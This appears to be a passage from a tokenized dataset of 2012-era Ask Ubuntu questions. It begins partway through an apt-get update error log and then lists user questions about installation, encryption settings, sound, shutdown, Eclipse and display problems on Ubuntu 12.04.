//ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease get:2 http : //dl.google.com stable release.gpg [ 198 b ] err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net precise release.gpg unable to connect to ppa.launchpad.net : http : get:3 http : //dl.google.com stable release [ 1,347 b ] get:4 http : //dl.google.com stable release [ 1,347 b ] get:5 http : //dl.google.com stable/main i386 packages [ 1,268 b ] ign http : //dl.google.com stable/main translationindex get:6 http : //dl.google.com stable/main i386 packages [ 769 b ] ign http : //dl.google.com stable/main translationindex ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en fetched 5,127 b in 7s ( 673 b/s ) reading package lists ... done w : failed to fetch http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/dists/precise-security/inrelease w : failed to fetch http : //ppa.launchpad.net/elementary-os/stable/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/elementaryart/elementary-dev/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/midori/ppa/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/nemequ/sqlheavy/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/ricotz/docky/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/sgringwe/beatbox/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/yorba/ppa/ubuntu/dists/precise/inrelease w : failed to fetch http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/dists/precise/release.gpg unable to connect to ftp.u-picardie.fr : http : w : failed to fetch http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/dists/precise-updates/release.gpg unable to connect to ftp.u-picardie.fr : http : w : failed to fetch http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/dists/precise-backports/release.gpg unable to connect to ftp.u-picardie.fr : http : w : failed to fetch http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/dists/precise-security/release.gpg unable to connect to ftp.u-picardie.fr : http : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en_us unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.88.33 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //ppa.launchpad.net/caffeine-developers/ppa/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/elementary-os/stable/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/elementaryart/elementary-dev/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/midori/ppa/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/nemequ/sqlheavy/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/ricotz/docky/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/sgringwe/beatbox/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/yorba/ppa/ubuntu/dists/precise/release.gpg unable to connect to ppa.launchpad.net : http : w : some index files failed to download . they have been ignored , or old ones used instead . w : duplicate sources.list entry http : //ppa.launchpad.net/nemequ/sqlheavy/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_nemequ_sqlheavy_ubuntu_dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry http : //ppa.launchpad.net/sgringwe/beatbox/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_sgringwe_beatbox_ubuntu_dists_precise_main_binary-i386_packages ) contents of /etc/apt/sources.list : # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) ] / oneiric main restricted deb-src http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise main restricted deb-src http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-updates main restricted deb-src http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise universe deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise multiverse deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-backports main restricted universe multiverse # added by software-properties deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-security main restricted deb-src http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-security restricted main multiverse universe # added by software-properties deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-security universe deb http : //ftp.u-picardie.fr/mirror/ubuntu/ubuntu/ precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main testing alternate sources.list file these are the steps i followed to produce the following output : please backup your sources.list : sudo cp /etc/apt/sources.list /etc/apt/sources.list.backup and then replace the contents of /etc/apt/sources.list with the below lines and run apt-get update : deb http : //archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu precise partner deb http : //extras.ubuntu.com/ubuntu precise main output : someone @ someone-ubook : ~ $ sudo apt-get update ign http : //archive.canonical.com precise inrelease hit http : //archive.canonical.com precise release.gpg hit http : //archive.canonical.com precise release ign http : //archive.ubuntu.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise release.gpg ign http : //archive.ubuntu.com precise-backports inrelease ign http : //archive.canonical.com precise/partner translationindex err http : //archive.canonical.com precise/partner translation-en_us unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] err http : //archive.canonical.com precise/partner translation-en unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] hit http : //extras.ubuntu.com precise release get:1 http : //archive.ubuntu.com precise release.gpg [ 198 b ] ign http : //dl.google.com stable inrelease err http : //dl.google.com stable inrelease err http : //dl.google.com stable release.gpg unable to connect to dl.google.com : http : [ ip : 173.194.34.38 80 ] err http : //dl.google.com stable release.gpg unable to connect to dl.google.com : http : [ ip : 173.194.34.38 80 ] get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise/main i386 packages get:3 http : //archive.ubuntu.com precise-backports release.gpg [ 198 b ] ign http : //security.ubuntu.com precise-security inrelease ign http : //extras.ubuntu.com precise/main translationindex err http : //extras.ubuntu.com precise/main translation-en_us unable to connect to extras.ubuntu.com : http : err http : //extras.ubuntu.com precise/main translation-en unable to connect to extras.ubuntu.com : http : get:4 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:5 http : //archive.ubuntu.com precise release [ 49.6 kb ] get:6 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:7 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:8 http : //archive.ubuntu.com precise-backports release [ 49.6 kb ] get:9 http : //security.ubuntu.com precise-security/main i386 packages [ 32.9 kb ] get:10 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:11 http : //security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:12 http : //security.ubuntu.com precise-security/universe i386 packages [ 8,594 b ] get:13 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] get:14 http : //security.ubuntu.com precise-security/main translationindex [ 73 b ] get:15 http : //security.ubuntu.com precise-security/multiverse translationindex [ 71 b ] get:16 http : //security.ubuntu.com precise-security/restricted translationindex [ 70 b ] get:17 http : //security.ubuntu.com precise-security/universe translationindex [ 72 b ] get:18 http : //security.ubuntu.com precise-security/main translation-en [ 13.6 kb ] get:19 http : //security.ubuntu.com precise-security/multiverse translation-en [ 587 b ] get:20 http : //security.ubuntu.com precise-security/restricted translation-en [ 14 b ] get:21 http : //security.ubuntu.com precise-security/universe translation-en [ 6,261 b ] get:22 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:23 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease get:24 http : //ppa.launchpad.net precise release.gpg [ 316 b ] get:25 http : //ppa.launchpad.net precise release.gpg [ 316 b ] get:26 http : //ppa.launchpad.net precise release.gpg [ 316 b ] ign http : //ppa.launchpad.net precise release.gpg get:27 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg get:28 http : //ppa.launchpad.net precise release.gpg [ 316 b ] get:29 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg get:30 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg get:31 http : //ppa.launchpad.net precise release [ 11.9 kb ] get:32 http : //ppa.launchpad.net precise release [ 11.9 kb ] get:33 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:34 http : //ppa.launchpad.net precise release [ 11.9 kb ] ign http : //ppa.launchpad.net precise release get:35 http : //ppa.launchpad.net precise release [ 11.9 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise/restricted translationindex get:36 http : //ppa.launchpad.net precise release [ 11.9 kb ] hit http : //archive.ubuntu.com precise/universe translationindex get:37 http : //ppa.launchpad.net precise release [ 11.9 kb ] get:38 http : //archive.ubuntu.com precise-updates/main i386 packages [ 96.5 kb ] hit http : //ppa.launchpad.net precise release get:39 http : //ppa.launchpad.net precise release [ 11.9 kb ] get:40 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] hit http : //ppa.launchpad.net precise release get:41 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 27.7 kb ] get:42 http : //ppa.launchpad.net precise/main sources [ 524 b ] get:43 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] get:44 http : //ppa.launchpad.net precise/main i386 packages [ 507 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex get:45 http : //ppa.launchpad.net precise/main sources [ 932 b ] hit http : //archive.ubuntu.com precise-updates/universe translationindex get:46 http : //ppa.launchpad.net precise/main i386 packages [ 1,017 b ] get:47 http : //archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] ign http : //ppa.launchpad.net precise/main translationindex get:48 http : //archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:49 http : //archive.ubuntu.com precise-backports/universe i386 packages [ 1,391 b ] get:50 http : //ppa.launchpad.net precise/main sources [ 1,402 b ] get:51 http : //archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] hit http : //archive.ubuntu.com precise-backports/main translationindex get:52 http : //ppa.launchpad.net precise/main i386 packages [ 1,605 b ] hit http : //archive.ubuntu.com precise-backports/multiverse translationindex ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translation-en get:53 http : //ppa.launchpad.net precise/main sources [ 931 b ] hit http : //archive.ubuntu.com precise/restricted translation-en get:54 http : //ppa.launchpad.net precise/main i386 packages [ 1,079 b ] hit http : //archive.ubuntu.com precise/universe translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //ppa.launchpad.net precise/main sources hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //ppa.launchpad.net precise/main i386 packages hit http : //archive.ubuntu.com precise-updates/restricted translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-updates/universe translation-en get:55 http : //ppa.launchpad.net precise/main sources [ 3,611 b ] hit http : //archive.ubuntu.com precise-backports/main translation-en get:56 http : //ppa.launchpad.net precise/main i386 packages [ 2,468 b ] hit http : //archive.ubuntu.com precise-backports/multiverse translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en get:57 http : //ppa.launchpad.net precise/main sources [ 1,524 b ] get:58 http : //ppa.launchpad.net precise/main i386 packages [ 2,719 b ] ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:59 http : //ppa.launchpad.net precise/main sources [ 1,052 b ] get:60 http : //ppa.launchpad.net precise/main i386 packages [ 1,388 b ] ign http : //ppa.launchpad.net precise/main translationindex get:61 http : //ppa.launchpad.net precise/main sources [ 1,185 b ] get:62 http : //ppa.launchpad.net precise/main i386 packages [ 1,698 b ] ign http : //ppa.launchpad.net precise/main translationindex err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en fetched 6,699 kb in 15s ( 445 kb/s ) reading package lists ... done w : failed to fetch http : //dl.google.com/linux/talkplugin/deb/dists/stable/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en_us unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/sta
135936	persistant file system vs installation onto usb stick	i want to install ubuntu to a 4gb usb stick , so that i can boot it on other computers , but i heard that a persistent file system never deletes data and so just fills up . this would be a problem as i like to keep ubuntu up to date , and downloading 100mb worth of upgrades on a regular basis would fill up the drive quite fast if they never truly overwrote old ones . so can someone please tell me if this is true and , also , if there are any advantages to using a persistent file system over just installing ubuntu to the drive . in addition , would it be possible to install the ubuntu installer onto a normal installation of ubuntu - ie , if i used the installer to install to the live stick , would i be able to get the installer back on the usb stick to install it on further machines ? it 's not really an issue if i ca n't , but i am curious . thank you .
135937	can ecryptfs-setup-private be made to use a 256 bit aes key ( instead of the default 128 bit key length ) ?	ecryptfs-setup-private will by default use an aes 128 bit key . can i make it use a 256 bit key ( 32 bytes key length ) ? of course , i could do the whole process manually as described here : https : //wiki.archlinux.org/index.php/system_encryption_with_ecryptfs # setup_.28in_detail.29 but i want to have the convenience of using ecryptfs 's easy to use tools but just with a stronger encryption key . i tried modifying /usr/bin/ecryptfs-setup-private ( changing keybytes= '' 16 '' to keybytes= '' 32 '' inside ) , but the process of creating the private/.private directories will fail .
135938	logging into a profile take more than 45 seconds in ubuntu 12.04	my ubuntu 12.04 installation has /home on a separate partition . after i installed ubuntu 12.04 , the logging in time to my profile has increased tremendously - a min of 45 secs to get the desktop . i tried removing some startup programs like checking for hardware drivers , empathy , orca screen reader and screensaver , but it did not help . has anyone got any suggestion ?
135941	no sound : ubuntu 12.04 new install	i have just installed ubuntu 12 and i am not hearing anything . the alsa info dignostic tool command output is put here : http : //www.alsa-project.org/db/ ? f=ba499573f672309636489535508a9446c277a2a3 update : its not that the sound is absolutely absent . it is basically stuttering a lot . and yes , there 's no mute or anything . appreciate any help on this . this is so frustrating , it seems this is going to be the dealbreaker here .
135942	with unity , how can i switch between multiple x configurations defined in /etc/x11/ ?	on a machine that has several graphicscards we used to do startx -- -config to select the configuration that outputs graphics to the desired screens . now with ubuntu 12.04 startx is not really supported anymore . how can i switch between multiple x11 configurations using lightdm or unity ?
135943	ubuntu 12.04 is not doing normal shutdown	i have installed ubuntu 12.04 on my laptop.every thing is working fine.but from last two days i am facing a problem and that is when i am going to shutdown my system , it is showing the shutdown process but it is actually not doing shut down.the screen is reaming like that for many time then i am doing the forcibly shutdown by pressing the start key of my system.can someone tell me what is the wrong going on ? any help and suggestions will be highly appreciable . [ update ] when the shutdown process was going on i just pressed the esc key and it showed the error message like this modem manager [ 878 ] : < info > caught signal 15 , is shutting down ... [ fail ]
135953	libreoffice on multiple monitors . menus open in wrong monitor	i am on 12.04 64bit , on 3 monitors , 12.3 fglrx drivers and use libreoffice 3.5.3 ( ubuntu repositories ) . the menus of libreoffice seem to open on the wrong screen . it seems this is an old bug , but i have only noticed it when ubuntu updated libreoffice to 3.5.3 . previously everything was ok. every other application behaves ok . this issues has been reported in bugzilla http : //listarchives.libreoffice.org/global/users/msg18576.html and launchpad https : //bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/974900 does anyone knows if there is a workaround ? this bug prevents me from using libreoffice .
135955	email piping with thunderbird	i have a php script ( osticket ) that has the ability for parsing piped emails . in theory it would be very simple to execute a script and post the email source code to it . is there a plugin available that does that ? or is there any other possible option ?
135956	spotify support in clementine broken 12.04 also purging does n't work	i downloaded clementine because i heard it had all sorts of connections to online music sources , including spotify . i had it installed before but it was from the software center and did n't have spotify for some reason . so i uninstall that and install it from the .deb on clementine 's website . i open it up put my login info in and install the plugin that it needs to support spotify . i start playing some songs from my spotify and it works just fine . but then i accidentally right clicked and selected one of my playlist to sync for offline listening , so i exited clementine to make it stop doing that . now whenever i try to play something on spotify on it , it just plays like the first second of the track then skips to the next track and then stops completely , also spotify results are n't showing up in the search bar even though i have spotify checked off to be in the searches . i tried `` complete removal '' in synaptic and the purge command in the terminal on it to completely remove it so i could reinstall again and fix the problem , and the purge command does work on it , but when i reinstall it , it still remembers all my settings , like my logins and layout choices and songs in my playlist . it 's as if it does n't realize that i even purged it . i do n't know how to fix it , there is n't a .clementine folder in the home folder for me to look at and i do n't know why purging it is n't working .
135957	ubuntu 12.04 - wake issue from suspend . acer aspire one 722	same issue as on ubuntu 11.11 the aspire 722 wo n't wake from suspension . this time the fixes for 11.11 are not applicable , jupiter 0.1.2 is n't helping . i have tried both the opensource drivers and the ati/amd proprietary fglrx graphics driver . ati/amd proprietary fglrx graphics driver ( post-release updates ) for some reason wo n't install on my machine , and times out on install . anyone had similar issues or advice ? i have yet to write a bug report and am a little confused as to how i could , as the computer needs to be restarted to get anything back on the screen . so my only option is to disable suspend altogether , which is not very practical on a laptop , as you can imagine . thanks in advance for your help ! ed
135958	eclipse wo n't work in 12.04 64 bit	i just finished upgrading my ubuntu i had eclipse installed from terminal using apt-get install eclipse now i 'm getting the following error an error has occurred . see the log file /home/toluwanimi/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1336830746877.log . please how do i go fix this i 've tried most of the fixes on this site but they do n't seem to work for me here 's the log ! session 2012-05-12 14:52:26.563 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_02 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_gb command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-05-12 14:52:29.469 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/toluwanimi/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/toluwanimi/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java1386 )
135960	multimedia email key does n't work in kde	my laptop keyboard have two multimedia keys : email and www . key to open www browser works and has no problem , but email key after it has pressed does n't open email client . when i configure this shortcut in systemsetting after i press this key it is normally recognized , but it email client no started .
135965	unity 3d not working on acer d270 w/ intel gma 3600	i recently bought myself an acer aspire one d270 with the gma 3600 graphics chipset thinking i would get some lovely graphics . however , i am stuck using unity 2d and i cant figure out how to enable 3d . none of the fixes i have found so far have worked . another effect of this is that i cant change the backlight brightness . so whenever i open the lid , looking at the screen is like staring into the sun . is there a driver for it in the works ? does the 3.4 kernel support the chipset and most of all is there a way to fix this ? please help
135970	unable to install from cd or usb drive	ubuntu installer in some place shows that one of the files is corrupted or something . after picking the `` retry '' option it continues , and at the end of installation it shows unable to install ubuntu . i 've tried both a usb drive and a cd , but the result was the same . is there any easy to install version of ubuntu , which can just connect the internet and download missing/corrupted/damaged/etc.files instead of failing installation ?
135973	how to reset name shown in terminal	when i installed ubuntu 12 , my terminal was showing user @ xyz . after fiddling with some external application , now my terminal looks like this user @ abc . how to switch back to xyz ? thanks a lot . updated : i changed my /etc/hosts file from 127.0.0.1 localhost 127.0.1.1 myubuntu to 127.0.0.1 localhost 127.0.1.1 ubun12 server.ubun12 dev.ubun12 *.ubun12 so previously it was admin @ myubuntu , but now it is admin @ ubun12
135987	how to visually indicate whether a window is `always on top` ?	set window always on top is very useful . how to visually indicate whether a window is always on top ? for example , add a icon like : at the top right corner . or change the color of the border ...
135989	ubuntu 12.04 restart function	problem with dell inspiron 1520 - dual boot : windows xp and ubuntu . after updating ubuntu 11.10 to ubuntu 12.04 shutdown- > restart function is not working . another problem : starting grub ( version 0.97 ) menu screen shows old ubuntu 11.10 entries . after selecting 11.10 entry , logon screen shows ubuntu 12.04 title . restart function does not work before or after logon - in both unity and gnome classic ( no effects ) desktops . terminal command : `` sudo reboot '' works ; `` sudo shutdown -r now '' does not work most of the time . problems corrected in ubuntu 12.10 ! ! !
135993	empathy can not connect with google talk and facebook	my empathy does n't connect with google talk and facebook . it worked for the first two weeks ( after installation ) . i am using ubuntu 12.04 ( precise pangolin ) .
135996	why my lscpi command not found ?	when u try to check my vga using this code lscpi | grep vga and my console say this no command 'lscpi ' found , did you mean : command 'lscpu ' from package 'util-linux ' ( main ) command 'lscp ' from package 'nilfs-tools ' ( universe ) command 'lspci ' from package 'pciutils ' ( main ) lscpi : command not found oh and i have installed pciutils from synaptic thank you before and i use ubuntu 12.04
135998	how to reduce the spacing between icons in nautilus ?	is it possible reduce the horizontal spacing between icons in nautilus ? i would like my layout to be more compact . i know that we can change the zoom level of the icons , but i want the icon size to remain the same . here 's a screenshot for better idea
136003	evince ignores page margins when printing	i 'd like to print a pdf with custom page margin settings . so i opened the pdf with evince ( standard document viewer ) and added a new page size in the print dialog : it has a bigger margin on the right side in this case . but on the printed paper or in the print preview the margins are ignored no matter what the exact settings are . when i do the same procedure in gimp in the print dialog it works perfectly as expected but evince just seems to ignore the margin settings . unfortunately in gimp i ca n't print all pages in a pdf at once so i 'm looking for a solution with evince or a better pdf viewer if there is one .
136006	trying to hook up an external monitor to netbook	when i plug the external monitor up to my netbook it is n't found . i restart with them connected and it displays on the external monitor , but in the wrong resolution , shifted ~100 pixels to the right , and in a slightly brownish hue . i 've tried using xrandr but it always gives me an error stating that xrandr : failed to get size of gamma for output default the netbook 's original monitor has the resolution of 1024x600 ( 16:9 ) and the monitor has 1600x900 ( 16:9 ) , but when i restart with them connected the default resolution of the netbook itself changes to 1024x768 ( 4:3 ) . does anyone know how to fix this problem ? i have an integrated intel chip if that helps .
136008	how to obtain and install vmware player ?	i am new to ubuntu/linux and i want to install vmware player in my ubuntu 12.04 . can anyone please guide me step by step how to install vmware player ?
136014	how do i add an indicator to display lm-sensors information ?	i want to be able to see how hot my system is from the indicator menu , kind of like speedfan does it on windows . i remember doing this some time ago in ubuntu , but ca n't figure it out now . using 12.04 .
